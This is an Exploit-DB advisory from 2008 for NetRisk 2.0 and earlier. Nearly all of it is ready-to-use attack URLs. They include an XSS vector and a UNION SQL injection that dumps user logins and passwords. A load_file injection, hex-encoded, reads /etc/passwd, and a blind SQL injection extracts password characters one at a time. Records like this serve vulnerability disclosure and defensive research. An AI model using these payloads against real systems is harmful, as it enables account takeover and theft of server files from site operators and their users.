NetRisk <= 2.0 XSS/SQL Injection Remote Vulnerabilities

2008-11-02T00:00:00
ID EDB-ID:6957
Type exploitdb
Reporter StAkeR
Modified 2008-11-02T00:00:00

Description

NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities. CVE-2008-4887,CVE-2008-4888. Webapps exploit for php platform

                                        
                                            
# -----------------------------------------------------------------
# NetRisk &lt;= 2.0 (XSS/SQL Injection) Remote Vulnerabilities
# -----------------------------------------------------------------
# Discovered By StAkeR aka athos
# Download On http://downloads.sourceforge.net/netrisk
# Works Regardless Of php.ini Settings!
# -----------------------------------------------------------------

# Cross Site Scripting 	
# index.php?error=&lt;script&gt;[javascript]&lt;/script&gt;

# Remote SQL Injection 
# index.php?p=profile&id=1+union+all+select+0,0,concat(login,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0+from+netrisk_users+where+id=1/*
# index.php?p=profile&id=1+union+all+select+0,0,load_file(0x2F6574632F706173737764),0,0,0,0,0,0,0,0,0,0,0,0/*

# Remote Blind SQL Injection
# index.php?p=game&id=1 and ascii(substring((select password from netrisk_users where id=1),1,1))=[ascii]/*

# milw0rm.com [2008-11-02]